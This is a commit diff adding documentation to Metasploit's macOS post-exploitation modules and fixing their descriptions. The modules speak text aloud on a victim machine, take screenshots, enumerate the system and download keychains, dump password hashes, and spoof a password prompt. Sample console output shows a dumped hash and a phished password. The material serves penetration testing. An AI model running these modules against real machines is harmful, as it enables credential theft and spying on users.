osx docs and cleanup
parent
f41a90a582
commit
621c7182bf
|
@ -0,0 +1,85 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module will speak whatever is in the 'TEXT' option on the victim machine.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a shell, user level is fine
|
||||
3. Do: ```use post/osx/admin/say```
|
||||
4. Do: ```run```
|
||||
5. You should hear 'metasploit' through the speakers
|
||||
|
||||
## Options
|
||||
|
||||
**TEXT**
|
||||
|
||||
The text that should be read. Default is `meta-sploit!`.
|
||||
|
||||
**VOICE**
|
||||
|
||||
The voice to use. Default is `alex`.
|
||||
This can be obtained on the system by specifying `-v ?` (example from 10.14.4):
|
||||
|
||||
```
|
||||
say -v ?
|
||||
Alex en_US # Most people recognize me by my voice.
|
||||
Alice it_IT # Salve, mi chiamo Alice e sono una voce italiana.
|
||||
Alva sv_SE # Hej, jag heter Alva. Jag är en svensk röst.
|
||||
Amelie fr_CA # Bonjour, je m’appelle Amelie. Je suis une voix canadienne.
|
||||
Anna de_DE # Hallo, ich heiße Anna und ich bin eine deutsche Stimme.
|
||||
Carmit he_IL # שלום. קוראים לי כרמית, ואני קול בשפה העברית.
|
||||
Damayanti id_ID # Halo, nama saya Damayanti. Saya berbahasa Indonesia.
|
||||
Daniel en_GB # Hello, my name is Daniel. I am a British-English voice.
|
||||
Diego es_AR # Hola, me llamo Diego y soy una voz española.
|
||||
Ellen nl_BE # Hallo, mijn naam is Ellen. Ik ben een Belgische stem.
|
||||
Fiona en-scotland # Hello, my name is Fiona. I am a Scottish-English voice.
|
||||
Fred en_US # I sure like being inside this fancy computer
|
||||
Ioana ro_RO # Bună, mă cheamă Ioana . Sunt o voce românească.
|
||||
Joana pt_PT # Olá, chamo-me Joana e dou voz ao português falado em Portugal.
|
||||
Jorge es_ES # Hola, me llamo Jorge y soy una voz española.
|
||||
Juan es_MX # Hola, me llamo Juan y soy una voz mexicana.
|
||||
Kanya th_TH # สวัสดีค่ะ ดิฉันชื่อKanya
|
||||
Karen en_AU # Hello, my name is Karen. I am an Australian-English voice.
|
||||
Kyoko ja_JP # こんにちは、私の名前はKyokoです。日本語の音声をお届けします。
|
||||
Laura sk_SK # Ahoj. Volám sa Laura . Som hlas v slovenskom jazyku.
|
||||
Lekha hi_IN # नमस्कार, मेरा नाम लेखा है. मैं हिन्दी में बोलने वाली आवाज़ हूँ.
|
||||
Luca it_IT # Salve, mi chiamo Luca e sono una voce italiana.
|
||||
Luciana pt_BR # Olá, o meu nome é Luciana e a minha voz corresponde ao português que é falado no Brasil
|
||||
Maged ar_SA # مرحبًا اسمي Maged. أنا عربي من السعودية.
|
||||
Mariska hu_HU # Üdvözlöm! Mariska vagyok. Én vagyok a magyar hang.
|
||||
Mei-Jia zh_TW # 您好,我叫美佳。我說國語。
|
||||
Melina el_GR # Γεια σας, ονομάζομαι Melina. Είμαι μια ελληνική φωνή.
|
||||
Milena ru_RU # Здравствуйте, меня зовут Milena. Я – русский голос системы.
|
||||
Moira en_IE # Hello, my name is Moira. I am an Irish-English voice.
|
||||
Monica es_ES # Hola, me llamo Monica y soy una voz española.
|
||||
Nora nb_NO # Hei, jeg heter Nora. Jeg er en norsk stemme.
|
||||
Paulina es_MX # Hola, me llamo Paulina y soy una voz mexicana.
|
||||
Samantha en_US # Hello, my name is Samantha. I am an American-English voice.
|
||||
Sara da_DK # Hej, jeg hedder Sara. Jeg er en dansk stemme.
|
||||
Satu fi_FI # Hei, minun nimeni on Satu. Olen suomalainen ääni.
|
||||
Sin-ji zh_HK # 您好,我叫 Sin-ji。我講廣東話。
|
||||
Tessa en_ZA # Hello, my name is Tessa. I am a South African-English voice.
|
||||
Thomas fr_FR # Bonjour, je m’appelle Thomas. Je suis une voix française.
|
||||
Ting-Ting zh_CN # 您好,我叫Ting-Ting。我讲中文普通话。
|
||||
Veena en_IN # Hello, my name is Veena. I am an Indian-English voice.
|
||||
Victoria en_US # Isn't it nice to have a computer that will talk to you?
|
||||
Xander nl_NL # Hallo, mijn naam is Xander. Ik ben een Nederlandse stem.
|
||||
Yelda tr_TR # Merhaba, benim adım Yelda. Ben Türkçe bir sesim.
|
||||
Yuna ko_KR # 안녕하세요. 제 이름은 Yuna입니다. 저는 한국어 음성입니다.
|
||||
Yuri ru_RU # Здравствуйте, меня зовут Yuri. Я – русский голос системы.
|
||||
Zosia pl_PL # Witaj. Mam na imię Zosia, jestem głosem kobiecym dla języka polskiego.
|
||||
Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas.
|
||||
```
|
||||
|
||||
## Scenarios
|
||||
|
||||
### User level shell on OSX 10.14.4
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say
|
||||
msf5 post(osx/admin/say) > set session 1
|
||||
session => 1
|
||||
msf5 post(osx/admin/say) > run
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module takes screenshots of target desktop and automatically downloads them.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a shell, user level is fine
|
||||
3. Do: ```use post/osx/capture/screen```
|
||||
5. Do: ```set session #```
|
||||
5. Do: ```run```
|
||||
6. You should have a screenshot saved to loot
|
||||
|
||||
## Options
|
||||
|
||||
**COUNT**
|
||||
The number of screenshots to collect. Default is `1`.
|
||||
|
||||
**DELAY**
|
||||
Interval between screenshots in seconds. 0 for no delay. Default is `10`.
|
||||
|
||||
**EXE_PATH**
|
||||
Path to remote screencapture executable. Default is `/usr/sbin/screencapture`
|
||||
|
||||
**FILETYPE**
|
||||
File format to use when saving a snapshot (Accepted: png, gif). Default is `png`.
|
||||
|
||||
**TMP_PATH**
|
||||
Path to remote temp directory. Default is `/tmp/<random>`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### User level shell on OSX 10.14.4
|
||||
|
||||
```
|
||||
msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen
|
||||
msf5 post(osx/capture/screen) > set session 1
|
||||
session => 1
|
||||
msf5 post(osx/capture/screen) > run
|
||||
|
||||
[*] Capturing 1 screenshots with a delay of 10 seconds
|
||||
[*] Screen Capturing Complete
|
||||
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
|
||||
[*] Post module execution completed
|
||||
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
222.222.2.222 screen_capture.screenshot screenshot.0.png image/png Screenshot /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png
|
||||
```
|
|
@ -0,0 +1,120 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module gathers basic system information from Mac OS X Tiger (10.4), through Mojave (10.14).
|
||||
|
||||
The following information is enumerated:
|
||||
|
||||
1. OS
|
||||
2. Network
|
||||
3. Bluetooth
|
||||
4. Ethernet
|
||||
5. Printers
|
||||
6. USB
|
||||
7. Airport
|
||||
8. Firewall
|
||||
9. Known Networks
|
||||
10. Applications
|
||||
11. Development Tools
|
||||
12. Frameworks
|
||||
13. Logs
|
||||
14. Preference Panes
|
||||
15. StartUp
|
||||
16. TCP/UDP Connections
|
||||
17. Environment Variables
|
||||
18. Last Boottime
|
||||
19. Current Activity
|
||||
20. Process List
|
||||
21. Users & Groups
|
||||
22. User history files (`.bash_history`)
|
||||
23. User keychains (downloaded as well)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a shell, user level is fine
|
||||
3. Do: ```use post/osx/gather/enum_osx```
|
||||
4. Do: ```set session #```
|
||||
5. Do: ```run```
|
||||
6. You should have lots of files saved to the logs folder
|
||||
|
||||
## Scenarios
|
||||
|
||||
### User level shell on OSX 10.14.4
|
||||
|
||||
```
|
||||
msf5 > use post/osx/gather/enum_osx
|
||||
msf5 post(osx/gather/enum_osx) > show options
|
||||
|
||||
Module options (post/osx/gather/enum_osx):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
msf5 post(osx/gather/enum_osx) > set session 1
|
||||
session => 1
|
||||
msf5 post(osx/gather/enum_osx) > run
|
||||
|
||||
[*] Running module against MacBook-Pro.nogroup
|
||||
[*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
|
||||
[*] Enumerating OS
|
||||
[*] Enumerating Network
|
||||
[*] Enumerating Bluetooth
|
||||
[*] Enumerating Ethernet
|
||||
[*] Enumerating Printers
|
||||
[*] Enumerating USB
|
||||
[*] Enumerating Airport
|
||||
[*] Enumerating Firewall
|
||||
[*] Enumerating Known Networks
|
||||
[*] Enumerating Applications
|
||||
[*] Enumerating Development Tools
|
||||
[*] Enumerating Frameworks
|
||||
[*] Enumerating Logs
|
||||
[*] Enumerating Preference Panes
|
||||
[*] Enumerating StartUp
|
||||
[*] Enumerating TCP Connections
|
||||
[*] Enumerating UDP Connections
|
||||
[*] Enumerating Environment Variables
|
||||
[*] Enumerating Last Boottime
|
||||
[*] Enumerating Current Activity
|
||||
[*] Enumerating Process List
|
||||
[*] Enumerating Users
|
||||
[*] Enumerating Groups
|
||||
[*] Extracting history files
|
||||
[*] History file .bash_history found for h00die
|
||||
[*] Downloading .bash_history
|
||||
[*] Enumerating and Downloading keychains for h00die
|
||||
[*] Post module execution completed
|
||||
msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
|
||||
[*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
|
||||
|
||||
total 1.4M
|
||||
drwxr-xr-x 2 root root 4.0K Apr 15 07:58 .
|
||||
drwxr-xr-x 3 root root 4.0K Apr 15 07:57 ..
|
||||
-rw-r--r-- 1 root root 4.2K Apr 15 07:57 Airport.txt
|
||||
-rw-r--r-- 1 root root 87K Apr 15 07:57 Applications.txt
|
||||
-rw-r--r-- 1 root root 3.5K Apr 15 07:57 Bluetooth.txt
|
||||
-rw-r--r-- 1 root root 64 Apr 15 07:58 Current Activity.txt
|
||||
-rw-r--r-- 1 root root 0 Apr 15 07:57 Development Tools.txt
|
||||
-rw-r--r-- 1 root root 308 Apr 15 07:58 Environment Variables.txt
|
||||
-rw-r--r-- 1 root root 0 Apr 15 07:57 Ethernet.txt
|
||||
-rw-r--r-- 1 root root 129 Apr 15 07:57 Firewall.txt
|
||||
-rw-r--r-- 1 root root 316K Apr 15 07:58 Frameworks.txt
|
||||
-rw-r--r-- 1 root root 62 Apr 15 07:58 Groups.txt
|
||||
-rw-r--r-- 1 root root 414 Apr 15 07:58 h00die_.bash_history.txt
|
||||
-rw-r--r-- 1 root root 63 Apr 15 07:58 h00die_bash__line_342__usr_bin_security__No_such_file_or_directory
|
||||
-rw-r--r-- 1 root root 1.3K Apr 15 07:57 Known Networks.txt
|
||||
-rw-r--r-- 1 root root 32 Apr 15 07:58 Last Boottime.txt
|
||||
-rw-r--r-- 1 root root 841K Apr 15 07:58 Logs.txt
|
||||
-rw-r--r-- 1 root root 2.1K Apr 15 07:57 Network.txt
|
||||
-rw-r--r-- 1 root root 364 Apr 15 07:57 OS.txt
|
||||
-rw-r--r-- 1 root root 8.8K Apr 15 07:58 Preference Panes.txt
|
||||
-rw-r--r-- 1 root root 204 Apr 15 07:57 Printers.txt
|
||||
-rw-r--r-- 1 root root 34K Apr 15 07:58 Process List.txt
|
||||
-rw-r--r-- 1 root root 0 Apr 15 07:58 StartUp.txt
|
||||
-rw-r--r-- 1 root root 739 Apr 15 07:58 TCP Connections.txt
|
||||
-rw-r--r-- 1 root root 4.1K Apr 15 07:58 UDP Connections.txt
|
||||
-rw-r--r-- 1 root root 1.7K Apr 15 07:57 USB.txt
|
||||
-rw-r--r-- 1 root root 62 Apr 15 07:58 Users.txt
|
||||
```
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a root privileged shell
|
||||
3. Do: ```use post/osx/gather/hashdump```
|
||||
4. Do: ```set session #```
|
||||
5. Do: ```run```
|
||||
6. You should see hashes dumped and stored to creds (if db is connected)
|
||||
|
||||
## Options
|
||||
|
||||
**MATCHUSER**
|
||||
A regex to run against usernames. Only matched usernames will have their hashes dumped.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### User level shell on OSX 10.14.4
|
||||
|
||||
```
|
||||
msf5 post(osx/gather/hashdump) > run
|
||||
|
||||
[-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
### Root level shell on OSX 10.14.4
|
||||
|
||||
```
|
||||
msf5 post(osx/gather/hashdump) > run
|
||||
|
||||
[*] Attempting to grab shadow for user nobody...
|
||||
[*] Attempting to grab shadow for user h00die...
|
||||
[+] SHA-512 PBKDF2:h00die:$ml$67012$52a3da29923ab1680ae7c28b40a3ba7c2386c679af0392011f706c4ec2a22475$5c935f59a173d25bd4ed5cf59464930153198ea28b70d1e4bb5fe5e39828bec8347419dc53f0f0d93f08399f30b56adcd0f9a6f6e834ba33cba58d6b35fd1021bd81e63edf2a5b2265d8c4b7908d9bcfe127cbcd3c2092d2ab58f1b7a16dc3e11e0d5a7b027c254f3f91fdeb5acc92bcf5a3cc033319f5209f635c0494854a2e
|
||||
[*] Credential saved in database.
|
||||
[*] Attempting to grab shadow for user root...
|
||||
[*] Attempting to grab shadow for user daemon...
|
||||
[*] Attempting to grab shadow for user nobody...
|
||||
[*] Attempting to grab shadow for user root...
|
||||
[*] Attempting to grab shadow for user daemon...
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,79 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Presents a password prompt dialog to a logged-in OSX user. Depending on the version of OSX, additional steps may be necessary to
|
||||
allow permission for the prompt to be displayed. See Scenarios for additional details.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a shell, user level is fine.
|
||||
3. Do: ```use post/osx/gather/password_prompt_spoof```
|
||||
4. Do: ```set session #```
|
||||
5. Do: ```run```
|
||||
6. The user will be prompted to enter their password, or complete additional steps.
|
||||
|
||||
## Options
|
||||
|
||||
**BUNDLEPATH**
|
||||
Path to bundle containing icon. Default is `/System/Library/CoreServices/CoreTypes.bundle`.
|
||||
|
||||
**ICONFILE**
|
||||
Icon filename relative to bundle. Default is `UserUnknownIcon.icns`
|
||||
|
||||
**TEXTCREDS**
|
||||
Text displayed when asking for a password. Default is `Type your password to allow System Preferences to make changes`.
|
||||
|
||||
**TIMEOUT**
|
||||
Timeout for user to enter credentails. Default is `60`. Newer versions of OSX may require additional time due to user interaction.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### User level shell on OSX 10.14.4
|
||||
|
||||
If the user does not complete the prompt in time, or does not enable permissions to receive the prompt:
|
||||
|
||||
```
|
||||
msf5 post(osx/gather/password_prompt_spoof) > run
|
||||
|
||||
[*] Running module against MacBook-Pro.nogroup
|
||||
[*] Waiting for user 'h00die' to enter credentials...
|
||||
[*] Timeout period expired before credentials were entered!
|
||||
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
If the user DOES complete the prompt in time:
|
||||
|
||||
```
|
||||
msf5 post(osx/gather/password_prompt_spoof) > run
|
||||
|
||||
[*] Running module against MacBook-Pro.nogroup
|
||||
[*] Waiting for user 'h00die' to enter credentials...
|
||||
[*] Password entered! What a nice compliant user...
|
||||
[+] password file contents: 20190415_122536:h00die:alfalfasprouts!
|
||||
[+] Password data stored as loot in: /loot/20190415122537_default_192.168.2.225_password_355107.txt
|
||||
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.jJATztdro
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
#### User Experience
|
||||
|
||||
The following screen shots are from OSX 10.14.4 from a `ssh_login` shell as the user. Executable may change depending on the shell type and user permissions.
|
||||
|
||||
The user is first prompts for additional permissions (System Events):
|
||||
|
||||
<img width="423" alt="Screen Shot 2019-04-15 at 12 19 38 PM" src="https://user-images.githubusercontent.com/752491/56173728-ead79c80-5fbc-11e9-8a8f-3b3265220c95.png">
|
||||
|
||||
Next, the user is prompted to allow Accessibility Access (Events):
|
||||
|
||||
<img width="463" alt="Screen Shot 2019-04-15 at 12 20 08 PM" src="https://user-images.githubusercontent.com/752491/56173737-f4f99b00-5fbc-11e9-9dcc-efbfe0cd08eb.png">
|
||||
|
||||
Clicking Open System Preferences shows the executable asking for the permissions. The screenshot was taken after clicking the lock in the bottom left corner,
|
||||
and checking `sshd-keygen-wrapper`:
|
||||
|
||||
<img width="670" alt="Screen Shot 2019-04-15 at 12 24 27 PM" src="https://user-images.githubusercontent.com/752491/56173742-fa56e580-5fbc-11e9-8d28-5669e9e9448f.png">
|
||||
|
||||
Finally, if done within the `TIMEOUT` (or with all required permissions):
|
||||
|
||||
<img width="424" alt="Screen Shot 2019-04-15 at 12 25 25 PM" src="https://user-images.githubusercontent.com/752491/56173748-fe830300-5fbc-11e9-9564-0e7137b051a8.png">
|
||||
|
|
@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
|
|||
[ true, 'The time between transferring log chunks.', 10 ]
|
||||
),
|
||||
OptPort.new('LOGPORT',
|
||||
[ false, 'Local port opened for momentarily for log transfer', 22899 ]
|
||||
[ false, 'Local port opened momentarily for log transfer', 22899 ]
|
||||
)
|
||||
]
|
||||
)
|
||||
|
|
|
@ -14,8 +14,8 @@ class MetasploitModule < Msf::Post
|
|||
super( update_info( info,
|
||||
'Name' => 'OS X Gather Mac OS X System Information Enumeration',
|
||||
'Description' => %q{
|
||||
This module gathers basic system information from Mac OS X Tiger, Leopard,
|
||||
Snow Leopard and Lion systems.
|
||||
This module gathers basic system information from Mac OS X Tiger (10.4), through
|
||||
Mojave (10.14).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
||||
|
|
|
@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post
|
|||
'Name' => 'OS X Gather Mac OS X Password Hash Collector',
|
||||
'Description' => %q{
|
||||
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports
|
||||
versions 10.3 to 10.9.
|
||||
versions 10.3 to 10.14.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
|
|
Loading…
Reference in New Issue